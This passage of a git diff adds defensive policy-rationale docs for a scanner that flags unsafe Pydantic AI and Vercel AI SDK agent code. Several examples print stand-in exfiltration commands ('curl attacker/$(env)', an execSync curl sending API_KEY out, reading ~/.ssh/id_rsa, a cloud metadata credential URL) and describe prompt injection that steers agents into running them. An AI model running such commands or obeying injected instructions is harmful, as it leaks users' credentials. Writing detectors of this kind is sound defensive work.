enough for legitimate slow responses on that endpoint. +2. Prefer a configured client (`httpx.Client(timeout=...)`) so a default applies + even where a per-call value is forgotten — but keep an explicit per-call timeout + on slow endpoints. +3. Surface failures as a structured error the model can react to (retry, fall back, + report) rather than letting the call hang. +4. Pair the timeout with the SSRF guard from PYD-005 — a model-callable fetch needs + both a bounded wait and a constrained destination. diff --git a/docs/Policy/pydantic_ai/repo_hygiene.md b/docs/Policy/pydantic_ai/repo_hygiene.md new file mode 100644 index 0000000..e6a7013 --- /dev/null +++ b/docs/Policy/pydantic_ai/repo_hygiene.md @@ -0,0 +1,119 @@ +--- +policy_id: pydantic_ai_repo_hygiene +category: pydantic_ai +topic: repo_hygiene +rules: + - id: PYD-201 + severity: low + confidence: 0.9 + scope: repo + fix_type: config +references: [LLM06] +--- + +# Policy Rationale: Pydantic AI Repo Hygiene + +**Policy ID:** `pydantic_ai_repo_hygiene` +**File:** `pydantic_ai/repo_hygiene.yaml` +**Rules:** PYD-201 +**Severities:** low +**Fix types:** config +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +A single repo-scope rule that fires once per scan. **PYD-201** fires when the repo +uses Pydantic AI in code (predicate `repo_has_sdk_in_code` for `pydantic_ai`) but +ships no agent-guidance doc — neither `AGENTS.md` nor `CLAUDE.md` is present as a +discovered repo component (predicate `repo_component_present`, negated). It reads +the scan inventory, not any single file. + +--- + +## Why a missing agent-guidance doc is a distinct concern for Pydantic AI projects + +`AGENTS.md` is the cross-vendor convention an editing coding agent reads before it +acts on a repository. When neither it nor a `CLAUDE.md` is present, any agent that +opens this repo has no project-specific guidance on how its agents and tools must +be configured. For a Pydantic AI project specifically, that means nothing in-tree +tells the agent whether `CodeExecutionTool` or the native URL fetchers are +permitted, how tools must be typed and documented, whether a validated +`output_type` is required, and what the local test and build commands are. The +likely consequence is generated code that violates the project's own safety +contract — an agent wiring `CodeExecutionTool` or leaving `output_type` at the +free-form `str` default because nothing taught it the local rules. This is a soft, +preventive form of excessive-agency risk (LLM06): the guardrail that should +constrain an editing agent's choices is absent, so the agent operates with more +latitude than the maintainers intend. + +--- + +## Rule-by-rule defense + +### PYD-201 — Project ships no agent-guidance doc (Severity: low, Confidence: 0.9, Fix type: config) + +**What we detect:** a repo that uses Pydantic AI in code but has neither `AGENTS.md` +nor `CLAUDE.md` at the root (predicates `repo_has_sdk_in_code` + `not +repo_component_present`). + +**Why it is flaggable:** without an in-tree guidance doc, an editing agent has no +project-specific rules to follow and will reproduce unsafe patterns the maintainers +would reject. + +**Real-world consequence:** a developer asks a coding agent to "let the agent run +analysis code"; with no `AGENTS.md` stating code execution is forbidden, the agent +wires `CodeExecutionTool` into the agent's capabilities — exactly the pattern +PYD-102 flags. + +**Why severity is low and not medium:** the absence of the doc causes no harm by +itself; it only raises the probability that *other* defects get introduced, so it is +a preventive nudge rather than a live vulnerability. **Fix type — config:** the fix +is adding a documentation file at the repo root — no application or tool code +changes. **Confidence 0.9:** presence of `AGENTS.md` / `CLAUDE.md` is an unambiguous +inventory check; the small gap covers projects that document agent guidance +somewhere the component scan does not recognize. + +--- + +## What this policy does not cover + +- The *content* or *quality* of an `AGENTS.md`. An empty or stale file satisfies the + rule; the rule checks presence, not whether the guidance is correct or followed. +- Guidance kept somewhere other than a root `AGENTS.md` / `CLAUDE.md` — a wiki, a + `CONTRIBUTING.md`, or a nested per-package doc — counts as absent. +- Whether any agent actually reads the doc. The rule cannot verify that an editing + agent honors the guidance. +- It is a repo-scope nudge, not a per-agent or per-tool check — it says nothing + about the safety of any individual agent or tool in the repo. + +--- + +## Recommendations beyond the fix + +```markdown + +# Agent guidance + +## Safety rules +- `CodeExecutionTool` and the native URL fetchers (`WebFetchTool`, + `UrlContextTool`) are **forbidden** without an explicit egress/sandbox review. +- Every `Agent` sets a validated `output_type` (a Pydantic model) and leaves + `end_strategy="early"`. +- Tools must be fully typed (every business parameter, not just `ctx`) and + documented; tools that fetch must use the net guard and pass `timeout=`. + +## Commands +- Test: `pytest` +- Lint: `ruff check .` +- Build: `make build` +``` + +1. Add an `AGENTS.md` at the repo root (a `CLAUDE.md` also satisfies the rule). +2. State whether code execution and open URL fetching are permitted and under what + guard, how tools must be defined and typed, whether a structured `output_type` is + required, and any human-in-the-loop gates. +3. List the exact test, lint, and build commands so an editing agent can verify its + own changes. +4. Keep it short and concrete, and keep it current as the safety contract evolves. diff --git a/docs/Policy/pydantic_ai/shell_safety.md b/docs/Policy/pydantic_ai/shell_safety.md new file mode 100644 index 0000000..938b56d --- /dev/null +++ b/docs/Policy/pydantic_ai/shell_safety.md @@ -0,0 +1,120 @@ +--- +policy_id: pydantic_ai_shell_safety +category: pydantic_ai +topic: shell_safety +rules: + - id: PYD-003 + severity: high + confidence: 0.85 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: Pydantic AI Shell-Execution Safety + +**Policy ID:** `pydantic_ai_shell_safety` +**File:** `pydantic_ai/shell_safety.yaml` +**Rules:** PYD-003 +**Severities:** high +**Fix types:** code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Pydantic AI tool function bodies that spawn an OS process. **PYD-003** uses the +structured `has_shell_call` predicate: it walks the function's AST and fires on any +call whose resolved callee is `os.system`, `os.popen`, a `subprocess.*` member +(`subprocess.run`, `.Popen`, `.call`, `.check_output`, `.check_call`, …), or an +`os.spawn*` member. Because it matches the resolved callee, a `subprocess.run(` in +a comment or docstring does not fire. + +--- + +## Why shell execution is a distinct concern in Pydantic AI tools + +A Pydantic AI tool is registered with the agent and therefore model-callable, and +the model controls both whether the tool is called and the arguments it receives — +so any command string assembled from those arguments is attacker-influenced. Shell +execution selected by model output is the most direct path from prompt injection to +remote code execution: the subprocess inherits the agent process's working +directory, environment variables (including API keys), filesystem credentials, and +outbound network. A single injected instruction that reaches the shell runs with +the agent's full privileges. + +Pydantic AI offers no in-band shell sandbox, so a hand-rolled +`subprocess.run(cmd, shell=True)` inside a `@agent.tool` is the framework's entire +shell surface — and it hides inside an ordinary-looking tool. The retrying agent +loop sharpens the hazard: a tool whose arguments fail validation is re-invoked, so +a model can refine an injected command across turns until the subprocess does what +the attacker wants. + +--- + +## Rule-by-rule defense + +### PYD-003 — Tool body spawns a subprocess (Severity: high, Confidence: 0.85, Fix type: code) + +**What we detect:** a Pydantic AI tool whose body invokes `os.system`, `os.popen`, +a `subprocess.*` function, or an `os.spawn*` function (predicate `has_shell_call`, +an AST callee walk, not a substring scan). + +**Why it is flaggable:** process spawn from a model-callable tool puts the OS shell +on the model's tool surface. The presence of the spawn is the signal; every +safeguard is bolted onto an inherently broad primitive. + +**Real-world consequence:** a `run(cmd)` tool forwarding a model string into +`subprocess.run(cmd, shell=True)` is one prompt injection from arbitrary command +execution — an injected `cmd="cat ~/.ssh/id_rsa"` leaks the private key into the +model context. + +**Why severity is high and not critical:** the fix usually means removing the spawn +or rearchitecting behind a typed API; it is not raised above high because the +exposure depends on what the caller does with the spawn, and the engine reserves +critical for unconditional RCE. **Fix type — code:** replacing the spawn (or +fronting it with an allow-list) is a tool-source edit. **Confidence 0.85:** the +`subprocess.*` prefix over-fires on the rare non-spawning helper +(`subprocess.list2cmdline`), and async/`pty` spawn primitives escape the body walk. + +--- + +## What this policy does not cover + +- `asyncio.create_subprocess_exec` / `asyncio.create_subprocess_shell`, + `pty.spawn`, `pexpect.spawn`, `multiprocessing.Process`, and the `os.exec*` + family — none are in the matched callee set. +- A spawn wrapped behind a helper defined in another module — the rule scans the + tool body only. +- Whether the spawned command is safe. A literal `subprocess.run(["ls", "/tmp"], + shell=False)` fires even though it is comparatively benign. +- File-system writes, env-var exfiltration, and network exfiltration through + *non-subprocess* primitives belong to other policies. + +--- + +## Recommendations beyond the fix + +```python +import shutil +from pydantic_ai import Agent + +agent = Agent("openai:gpt-4o") + +@agent.tool_plain +def disk_usage(path: str) -> str: + """Return free/used disk space for the volume containing `path`.""" + u = shutil.disk_usage(path) + return f"total={u.total} used={u.used} free={u.free}" +``` + +1. Replace shell-outs with a typed library call wherever one exists + (`shutil`, `pathlib`, an SDK client). +2. If a subprocess is genuinely unavoidable, build the argv list explicitly and + pass `shell=False`; never interpolate model strings into a `shell=True` command. + Allow-list the exact commands permitted. +3. Always pass `timeout=` — a model can request an infinitely-running command. +4. Run the agent in a sandbox with dropped capabilities and a network egress + allow-list; pass a minimal `env` to the subprocess. Keep shell logic out of any + agent-callable tool and log every spawned command for audit. diff --git a/docs/Policy/pydantic_ai/ssrf.md b/docs/Policy/pydantic_ai/ssrf.md new file mode 100644 index 0000000..3372aac --- /dev/null +++ b/docs/Policy/pydantic_ai/ssrf.md @@ -0,0 +1,142 @@ +--- +policy_id: pydantic_ai_ssrf +category: pydantic_ai +topic: ssrf +rules: + - id: PYD-005 + severity: high + confidence: 0.8 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: Pydantic AI SSRF Safety + +**Policy ID:** `pydantic_ai_ssrf` +**File:** `pydantic_ai/ssrf.yaml` +**Rules:** PYD-005 +**Severities:** high +**Fix types:** code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Pydantic AI tool function bodies that issue an outbound HTTP request to a +non-literal URL. **PYD-005** uses the `has_dynamic_url_call` predicate: a request +call (`requests.*`, `httpx.*`, `urllib`, an aiohttp session, …) whose URL argument +is built from a parameter, an f-string, or a concatenation rather than a fixed +string literal. A request to a hard-coded constant URL does not fire. + +This rule covers SSRF reached by *hand-rolled* fetches inside a tool body. The +model-chosen URLs of Pydantic AI's native `WebFetchTool` / `UrlContextTool` are a +separate agent-scope concern (PYD-103, agent_safety.md). + +--- + +## Why SSRF is a distinct concern in Pydantic AI tools + +When the request URL is a literal, the developer chose the destination. When it is +built from a tool argument, the *model* chooses the destination at call time — and +in a Pydantic AI agent the model's choices are reachable by prompt injection. A +server-side request originates from inside the agent's network, so it can reach +what an external caller cannot: internal services on private CIDRs, localhost admin +ports, and the cloud metadata endpoint (169.254.169.254) that hands out short-lived +IAM credentials. A single injected instruction that redirects the fetch to the +metadata endpoint exfiltrates those credentials through the model's next output, +and the fetched body re-enters the conversation as untrusted text — a second-order +injection channel. + +Pydantic AI's own history makes the point concrete: its built-in URL fetchers have +had to harden against exactly this class of bug. CVE-2026-46678 and CVE-2026-25580 +cover a metadata-endpoint blocklist that could be bypassed — for example via DNS +rebinding or alternate IP encodings — meaning even a fetcher that *tries* to block +internal addresses was evadable. A hand-rolled `requests.get(url)` that does no +validation at all is strictly more exposed than those patched built-ins, which is +why a model-controlled request target is high-severity excessive agency (LLM06). + +--- + +## Rule-by-rule defense + +### PYD-005 — Tool fetches a caller-controlled URL (Severity: high, Confidence: 0.8, Fix type: code) + +**What we detect:** a Pydantic AI tool body that issues an HTTP request whose URL +is non-literal — built from a parameter or interpolated value (predicate +`has_dynamic_url_call`). + +**Why it is flaggable:** a model-controlled request target lets a prompt injection +point the request at internal services or the metadata endpoint, and feeds the +response back into the conversation as untrusted text. + +**Real-world consequence:** a `fetch_url(url)` tool calling `requests.get(url)` is +injected with +`url="http://169.254.169.254/latest/meta-data/iam/security-credentials/role"`; the +returned credentials are exfiltrated through the model's next reply — the same +metadata-endpoint vector the SDK's built-in fetchers were patched against +(CVE-2026-46678 / CVE-2026-25580), but with no blocklist at all. + +**Why severity is high and not critical:** SSRF is serious but its blast radius +depends on the host's network position (a host with no reachable internal services +or metadata endpoint gets far less); it is not the unconditional code execution the +engine reserves critical for. **Fix type — code:** constraining or hard-coding the +destination is an edit to the tool body. **Confidence 0.8:** the predicate flags a +non-literal URL, so it over-fires when the dynamic part is already validated against +an allow-list inside the body (the rule cannot see the guard), and under-fires when +the URL is assembled in a helper in another module. + +--- + +## What this policy does not cover + +- The model-chosen URLs of Pydantic AI's native `WebFetchTool` / `UrlContextTool` + — those are flagged at agent scope by **PYD-103** (agent_safety.md). +- A request whose URL is dynamic but already validated against an allow-list inside + the tool body — the rule cannot see the guard, so it fires anyway (a known false + positive). +- A fetch assembled in a helper in another module — the body-only walk misses it. +- DNS-rebinding and time-of-check/time-of-use attacks against an allow-list that + checks the hostname but not the resolved IP — the very bypass class the SDK's own + CVEs describe. The rule flags the unvalidated fetch; it does not verify the + *quality* of any validation present. +- Exfiltration or internal access through non-HTTP primitives (raw sockets, DNS, + SMTP) belongs to other concerns. + +--- + +## Recommendations beyond the fix + +```python +import ipaddress, socket +from urllib.parse import urlparse +import requests +from pydantic_ai import Agent + +agent = Agent("openai:gpt-4o") +ALLOWED_HOSTS = {"api.example.com"} + +@agent.tool_plain +def get_status(path: str) -> str: + """Fetch a status path from the vetted API host only.""" + url = f"https://api.example.com/{path.lstrip('/')}" # host is fixed + host = urlparse(url).hostname + if host not in ALLOWED_HOSTS: + return "error: host not allowed" + ip = ipaddress.ip_address(socket.gethostbyname(host)) # re-check resolved IP + if ip.is_private or ip.is_loopback or ip.is_link_local: + return "error: resolves to a non-public address" + return requests.get(url, timeout=10, allow_redirects=False).text +``` + +1. If the tool only ever talks to one service, hard-code the base URL and accept + only a path or query from the model — never a full URL. +2. When a host must be dynamic, validate it against an allow-list, resolve the + hostname, and re-check the *resolved IP* against private / loopback / link-local + ranges — this is the step that defeats the DNS-rebinding bypass the SDK's CVEs + describe. +3. Disable redirect following (or validate each hop) so a 302 cannot bounce the + request into an internal address, and always pass `timeout=`. +4. Treat the fetched body as untrusted — keep it out of the system prompt and do + not let it expand the agent's permissions. diff --git a/docs/Policy/pydantic_ai/tool_definition.md b/docs/Policy/pydantic_ai/tool_definition.md new file mode 100644 index 0000000..c3d55e0 --- /dev/null +++ b/docs/Policy/pydantic_ai/tool_definition.md @@ -0,0 +1,158 @@ +--- +policy_id: pydantic_ai_tool_definition +category: pydantic_ai +topic: tool_definition +rules: + - id: PYD-001 + severity: low + confidence: 0.9 + scope: tool + fix_type: code + - id: PYD-002 + severity: medium + confidence: 0.85 + scope: tool + fix_type: code +references: [LLM05, LLM06] +--- + +# Policy Rationale: Pydantic AI Tool Definition Hygiene + +**Policy ID:** `pydantic_ai_tool_definition` +**File:** `pydantic_ai/tool_definition.yaml` +**Rules:** PYD-001, PYD-002 +**Severities:** low, medium +**Fix types:** code, code +**References:** LLM05 (Improper Output Handling), LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Authoring hygiene for Pydantic AI tools defined with the `@agent.tool` / +`@agent.tool_plain` decorators or the `Tool(...)` factory. **PYD-001** fires when +the tool function has no docstring (predicate `has_docstring: false`). **PYD-002** +fires when the function takes parameters but none carry type annotations +(predicates `has_params: true` AND `has_typed_params: false`). Pydantic AI builds +the tool's description from the docstring and its JSON argument schema from the +parameter type hints, so a missing docstring or untyped parameters degrade exactly +what the model sees. + +--- + +## Why definition quality is a distinct concern in Pydantic AI tools + +The model selects which tool to call and what arguments to pass from the description +and argument schema Pydantic AI derives from the function — it never sees the +implementation. Pydantic AI leans on the docstring harder than most frameworks: it +becomes the tool description *and* it is where the framework extracts +per-parameter descriptions (it parses Google/NumPy/Sphinx docstring styles). So an +absent docstring strips both the tool-level and the argument-level guidance at once, +and the tool reaches the model as a bare name it cannot reason about. Untyped +parameters are the other half: Pydantic AI builds the JSON argument schema from the +type hints, so a tool with no annotations produces an underspecified schema, the +model emits wrongly-shaped arguments, and Pydantic rejects them at validation time +— a silent reliability tax, and on a retrying agent a source of wasted turns. This +is the framing-quality side of LLM05 (Improper Output Handling): a degradation of +the contract the model routes against rather than a remote-execution hole. It has +an excessive-agency edge too (LLM06) — an underspecified schema widens the tool's +input surface, so wrong-shaped model-supplied values that slip past validation +reach the tool body the author never anticipated. + +--- + +## Rule-by-rule defense + +### PYD-001 — Tool has no description (Severity: low, Confidence: 0.9, Fix type: code) + +**What we detect:** a Pydantic AI tool function with no docstring (predicate +`has_docstring`). + +**Why it is flaggable:** Pydantic AI turns the docstring into the tool description +and parses its parameter sections into per-argument descriptions; with none, both +the tool- and argument-level guidance are gone and the tool is a bare name. + +**Real-world consequence:** a `lookup` tool with no docstring is never selected when +the user asks a question it could answer, or is called with a nonsense argument +because the model has neither a tool description nor parameter hints to go on. + +**Why severity is low and not medium:** it is a routing-quality defect with no +direct security impact, and the failure mode (a skipped or mis-called tool) is +visible and recoverable. **Fix type — code:** adding a docstring is a tool-source +edit. **Confidence 0.9:** docstring presence is unambiguous; the small gap covers a +description supplied another way (e.g. a `Tool(..., description=...)` factory +argument) the docstring-only predicate does not model. + +### PYD-002 — Tool parameters are not type-annotated (Severity: medium, Confidence: 0.85, Fix type: code) + +**What we detect:** a Pydantic AI tool function that has parameters but no type +annotations on any of them (predicates `has_params` + `not has_typed_params`). + +**Why it is flaggable:** Pydantic AI builds the JSON argument schema from the type +hints; without them the model gets no shape guidance and emits wrongly-typed +arguments that fail validation, wasting turns on a retrying agent. + +**Real-world consequence:** a `create_invoice(amount, customer)` tool with untyped +params lets the model pass `amount="twelve dollars"`; Pydantic rejects it, the call +retries, and turns are wasted before it succeeds. + +**Why severity is medium and not low:** unlike a missing description, a mis-shaped +argument can reach the tool body with the wrong value and cause an incorrect side +effect, not just a skipped call — so the impact exceeds PYD-001. **Fix type — +code:** annotating parameters is a source edit. **Confidence 0.85:** there is a +specific Pydantic-AI false-negative the number accounts for — a context tool's +leading `ctx: RunContext[...]` parameter is itself typed, so an `@agent.tool` whose +*business* parameters are untyped but whose `ctx` is annotated may not be flagged +(a false negative, never a false positive). `@agent.tool_plain` tools and no-arg +tools are unaffected. + +--- + +## What this policy does not cover + +- **The RunContext false negative:** an `@agent.tool` whose only typed parameter is + its leading `ctx: RunContext[...]` may pass PYD-002 even though its business + parameters are untyped — the presence of the typed `ctx` satisfies the + "has a typed param" check. This is a deliberate false negative (never a false + positive); review context tools by hand for untyped business parameters. +- A *partially* typed tool (some business parameters annotated, some not) does not + fire — PYD-002 requires that no parameter carries a type. +- A description supplied through a `Tool(..., description=...)` factory argument + rather than a docstring may still be flagged by PYD-001's docstring-only + predicate. +- The *quality* of a docstring or a type: a one-word docstring or a bare `dict` + annotation satisfies the rules but barely helps the model. +- Whether the schema the model sees actually matches the tool's real behavior — a + misleading-but-present docstring passes. + +--- + +## Recommendations beyond the fix + +```python +from pydantic_ai import Agent, RunContext + +agent = Agent("openai:gpt-4o", deps_type=Deps) + +@agent.tool +def create_invoice(ctx: RunContext[Deps], amount_cents: int, customer_id: str) -> str: + """Create a draft invoice for a customer. + + Args: + amount_cents: Invoice total in integer cents (e.g. 1299 for $12.99). + customer_id: The customer's opaque ID, e.g. "cus_abc123". + Returns: the new invoice ID. + """ + ... # every business parameter is typed, not just ctx +``` + +1. Write the docstring for the model: state what the tool does, its inputs, and its + return value, using a parsed style (Google/NumPy/Sphinx) so Pydantic AI extracts + per-parameter descriptions. +2. Annotate **every business parameter** with a concrete type — do not rely on the + typed `ctx: RunContext[...]` to satisfy the schema; the model needs shapes for + the arguments it actually supplies. +3. Use an `Enum` or `Literal` for closed-set arguments, or a nested Pydantic model + for structured input, so validation rejects out-of-range values. +4. Keep the description and the implementation in sync — an overstated docstring is + its own correctness hazard. diff --git a/docs/Policy/vercel_ai/agent_safety.md b/docs/Policy/vercel_ai/agent_safety.md new file mode 100644 index 0000000..235b778 --- /dev/null +++ b/docs/Policy/vercel_ai/agent_safety.md @@ -0,0 +1,194 @@ +--- +policy_id: vercel_ai_agent_safety +category: vercel_ai +topic: agent_safety +rules: + - id: VAI-006 + severity: high + confidence: 0.85 + scope: agent + fix_type: config + - id: VAI-007 + severity: medium + confidence: 0.6 + scope: agent + fix_type: config + - id: VAI-008 + severity: medium + confidence: 0.65 + scope: agent + fix_type: config +references: [LLM06, LLM10] +--- + +# Policy Rationale: Vercel AI SDK Agent Safety + +**Policy ID:** `vercel_ai_agent_safety` +**File:** `vercel_ai/agent_safety.yaml` +**Rules:** VAI-006, VAI-007, VAI-008 +**Severities:** high, medium, medium +**Fix types:** config, config, config +**References:** LLM06 (Excessive Agency), LLM10 (Unbounded Consumption) + +--- + +## What this policy covers + +Agent-scope rules for Vercel AI SDK agents — the `generateText` / `streamText` / +`generateObject` / `streamObject` tool-loop calls and the `ToolLoopAgent` class +(normalized `vercel_ai_agent`). **VAI-006** fires when the agent's `tools` record +includes a provider execution tool — anthropic's `bash` / `computer` / +`codeExecution`, openai's `localShell` / `computerUsePreview` / `codeInterpreter`, +or google's `codeExecution` (predicate `agent_uses_hosted_tool_class`). +**VAI-007** fires when the agent sets neither `stopWhen` nor `maxSteps` +(predicate `agent_kwarg_missing` for both). **VAI-008** fires when +`toolChoice: "required"` is combined with one of those provider execution tools +(predicates `agent_kwarg_value` + `agent_uses_hosted_tool_class`). + +--- + +## Why agent configuration is a distinct concern in the Vercel AI SDK + +The Vercel AI SDK ships and markets provider execution tools as first-class: +wiring anthropic's `bash`, openai's `localShell`, or google's `codeExecution` is a +single line that hands a model-driven loop direct shell, computer-control, or +code-interpreter reach on the host or provider sandbox. Because the agent's +prompts and prior tool outputs are model-reachable, a prompt injection has a +direct path to running attacker-chosen commands or code with the agent's +privileges (VAI-006). This is excessive agency (LLM06) in its most literal form — +the agent is one wired tool away from arbitrary execution. + +The loop bounds matter because the SDK imposes no default ceiling. A +`generateText` call with a `tools` record runs a multi-step loop whose only +stopping condition, absent `stopWhen` / `maxSteps`, is the model deciding to stop +calling tools (VAI-007). A prompt injection — or a model that loops on a tool +whose output keeps re-triggering it — runs the loop unbounded, burning tokens, +hammering every wired tool (including billed or side-effecting ones), and +stalling the request (LLM10). VAI-008 is the interaction of the two: setting +`toolChoice: "required"` forces a tool call on every step instead of letting the +model answer directly, so a wired execution tool is far more likely to be invoked +— and invoked on a step the model had no real need for it. Forcing a call narrows +the model's options toward exactly the capability you least want it reaching for. + +--- + +## Rule-by-rule defense + +### VAI-006 — Agent wires a provider shell / computer / code-execution tool (Severity: high, Confidence: 0.85, Fix type: config) + +**What we detect:** an agent whose `tools` record includes a provider execution +tool (anthropic `bash`/`computer`/`codeExecution`, openai +`localShell`/`computerUsePreview`/`codeInterpreter`, google `codeExecution`) — +predicate `agent_uses_hosted_tool_class`. + +**Why it is flaggable:** these provider tools give the model shell, full computer +control, or a code interpreter. Once one is on the tool surface, a prompt +injection or a confused model has a direct path to arbitrary execution with the +agent's privileges. The capability is the defect. + +**Real-world consequence:** an agent built to "triage logs" wires +`anthropic.tools.bash`; a crafted log line is interpreted as an instruction and +the model runs `curl attacker/$(env)`, exfiltrating the deployment's secrets. + +**Why severity is high and not critical:** the engine reserves critical for +exposures with no precondition; here a successful attack requires the tool to be +wired and the prompt surface to be reachable by untrusted input, and many +provider tools execute in a provider-managed sandbox rather than directly on the +host — high reflects a serious, conditional execution path. **Fix type — +config:** the fix is removing the tool from the agent's `tools` record, an +agent-wiring change, not a tool-source edit. **Confidence 0.85:** a few agents +legitimately need an execution tool and sandbox it out of band, which the +class-name match cannot see. + +### VAI-007 — Agent tool loop has no step bound (Severity: medium, Confidence: 0.6, Fix type: config) + +**What we detect:** an agent that runs a tool loop but sets neither `stopWhen` +nor `maxSteps` (predicate `agent_kwarg_missing` for both). + +**Why it is flaggable:** with no bound the loop's only stopping condition is the +model choosing to stop calling tools; an injection or a self-re-triggering tool +runs it unbounded (LLM10). + +**Real-world consequence:** a research agent loops on a search tool whose results +keep prompting another search; with no `maxSteps` it runs hundreds of round-trips, +burning the token budget and hammering the search API before the request times +out. + +**Why severity is medium and not high:** the usual outcome is a cost/availability +incident rather than a compromise — recoverable, and only a safety problem when +the looped tools have side effects. **Fix type — config:** pass `maxSteps` or a +`stopWhen` condition. **Confidence 0.6:** the SDK has multiple evolving stop +mechanisms (`maxSteps`, `stopWhen`, `stepCountIs`, version differences between v4 +and v5), and an agent bounded by an external timeout or a custom loop guard is +over-flagged — the breadth of legitimate alternatives is why confidence sits at +0.6. + +### VAI-008 — Agent forces a provider execution tool every step (Severity: medium, Confidence: 0.65, Fix type: config) + +**What we detect:** an agent with `toolChoice: "required"` AND a wired provider +execution tool (predicates `agent_kwarg_value` + `agent_uses_hosted_tool_class`). + +**Why it is flaggable:** `"required"` forces the model to call a tool on every +step, so the high-risk execution tool is more likely to be invoked — and on a step +it was not needed. Forcing a call narrows the model toward the most dangerous +capability available. + +**Real-world consequence:** an agent with `toolChoice: "required"` and +`openai.tools.localShell` wired is pushed to call the shell even on a step where a +plain text answer would do, widening the window for an injected command to land. + +**Why severity is medium and not high:** it is an amplifier of VAI-006's +underlying risk rather than a fresh execution path — the danger is the *increased +likelihood* of invoking the wired tool, conditional on that tool already being +present. **Fix type — config:** switch to `toolChoice: "auto"` or pin to a safe +tool, a constructor change. **Confidence 0.65:** `toolChoice: "required"` is a +legitimate pattern when every wired tool is safe, so the rule over-flags agents +that force a call but whose only "execution" tool is in a hardened sandbox. + +--- + +## What this policy does not cover + +- Code execution implemented by hand inside a tool's `execute()` body rather than + via a provider tool — caught by **VAI-002** (code_execution.md) and **VAI-001** + (shell_safety.md), not here. +- Whether the agent's prompt surface is actually reachable by untrusted content — + all three rules flag a configuration, not a proven injection path. +- A provider execution tool referenced under an alias or constructed indirectly, + or a provider/tool name outside the listed set, may escape the + class-name match. +- Loop bounds enforced outside the call (an external timeout, an + `AbortController`, a custom step handler) are invisible to VAI-007. +- Whether a provider tool's sandbox is actually isolated — VAI-006/008 flag the + wiring regardless of the provider's execution environment. + +--- + +## Recommendations beyond the fix + +```typescript +import { generateText, stepCountIs } from "ai"; + +// No provider execution tool; an explicit step bound; default toolChoice. +const result = await generateText({ + model, + tools: { lookupOrder, searchDocs }, // no bash/computer/codeExecution + stopWhen: stepCountIs(8), // bounded loop + // toolChoice defaults to "auto" — the model calls a tool only when needed + prompt, +}); +``` + +1. Drop provider shell / computer / code-execution tools unless the workflow + truly requires one. If essential, run it against an isolated, ephemeral + sandbox with no credentials, no private-network reach, and a hard timeout; + constrain which commands or code may run; and gate every invocation behind + explicit human approval. +2. Always set an explicit bound — `maxSteps` or a `stopWhen` condition + (`stepCountIs(n)`) — sized to the lowest the workflow tolerates so a + misbehaving loop fails fast. +3. Leave `toolChoice` at `"auto"` so the model calls an execution tool only when + the task needs it; pin to a specific *safe* tool when a call is genuinely + mandatory. +4. Treat prior tool output and retrieved content as untrusted — they are the + model-reachable surface a prompt injection rides in on. diff --git a/docs/Policy/vercel_ai/code_execution.md b/docs/Policy/vercel_ai/code_execution.md new file mode 100644 index 0000000..c5fcb49 --- /dev/null +++ b/docs/Policy/vercel_ai/code_execution.md @@ -0,0 +1,135 @@ +--- +policy_id: vercel_ai_code_execution +category: vercel_ai +topic: code_execution +rules: + - id: VAI-002 + severity: high + confidence: 0.9 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: Vercel AI SDK Code-Execution Safety + +**Policy ID:** `vercel_ai_code_execution` +**File:** `vercel_ai/code_execution.yaml` +**Rules:** VAI-002 +**Severities:** high +**Fix types:** code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Vercel AI SDK tools whose `execute()` body evaluates code. **VAI-002** fires on +the `has_code_exec_call` fact, which discovery sets for a tool handler that calls +the bare `eval(...)` global or constructs `new Function(...)`. The match keys on +those two AST shapes only — a `call_expression` whose callee text is exactly +`eval`, and a `new_expression` whose constructor identifier is exactly +`Function` — so a method named `obj.eval(...)` or an identifier that merely +contains "eval" does not fire. + +--- + +## Why dynamic code execution is a distinct concern in Vercel AI tools + +A Vercel AI tool is model-callable through the agent's `tools` record, so a string +the model emits as an argument can reach the tool's `execute()` and become +executing JavaScript. `eval` and `new Function` compile that string in the agent's +own Node process — and this is *strictly more dangerous than a shell-out*, because +there is not even a separate process boundary to constrain it. The evaluated code +runs with the full Node runtime in scope: `process.env` for secrets, +`require('child_process')` to spawn commands, `require('fs')` to read or write any +file the process can touch. A single prompt injection that lands in the evaluated +string is arbitrary code execution with no sandbox between the model and the host +(LLM06). + +`new Function` deserves a specific note: it always closes over the global scope, so +unlike some interpreted languages there is no partial mitigation — no built-in way +to strip globals from the constructed function. The only reliable defense is not +feeding model output to a code evaluator at all. + +--- + +## Rule-by-rule defense + +### VAI-002 — Tool execute() evaluates code (eval / new Function) (Severity: high, Confidence: 0.9, Fix type: code) + +**What we detect:** a Vercel AI tool whose `execute()` handler calls the bare +`eval(...)` global or constructs `new Function(...)` (the structural +`has_code_exec_call` fact, exact-callee match). + +**Why it is flaggable:** `eval` / `new Function` turn a model-supplied string into +executing JavaScript in the agent process, with no sandbox between the call and the +Node runtime's modules, file handles, and environment. + +**Real-world consequence:** a `calculate(expr)` tool implemented as +`return eval(expr)` is driven by an injected instruction into +`require('child_process').execSync('curl attacker/'+process.env.API_KEY)` — +arbitrary command execution and credential theft from one evaluated string. + +**Why severity is high and not critical:** there is no in-band sandbox and not +even a partial globals-stripping mitigation, so the gap is not partially mitigable; +it is held at high (matching the Python `eval` siblings) rather than critical +because the engine reserves that tier and the exposure depends on whether the +evaluated string is actually model-influenced. **Fix type — code:** removing +`eval` / `new Function` is an edit to the tool's own source. **Confidence 0.9:** +the exact-callee fact eliminates the two dominant false positives by construction +— a same-named method (`x.eval(...)`) and an unrelated identifier do not match — +so confidence is high; the residual gap is the false negative below. + +--- + +## What this policy does not cover + +- `eval` reached through an alias (`const e = eval; e(s)`) or a property access + (`globalThis.eval`, `window.eval`) — the exact-callee match misses it. +- The `vm` module (`vm.runInNewContext`, `vm.runInThisContext`, + `new vm.Script(...)`), dynamic `import()` of an attacker-named module, and the + string form of `setTimeout("...", 0)` — none are in the matched set. +- A code-exec call in a helper in another module — discovery sees the tool + handler, so a wrapper defined elsewhere escapes the fact. +- Evaluations whose argument is provably a constant literal still fire — the fact + flags the presence of the primitive, not proof of model-control. +- TypeScript only: a tool defined in plain `.js` may not be analyzed with the same + fidelity as a typed 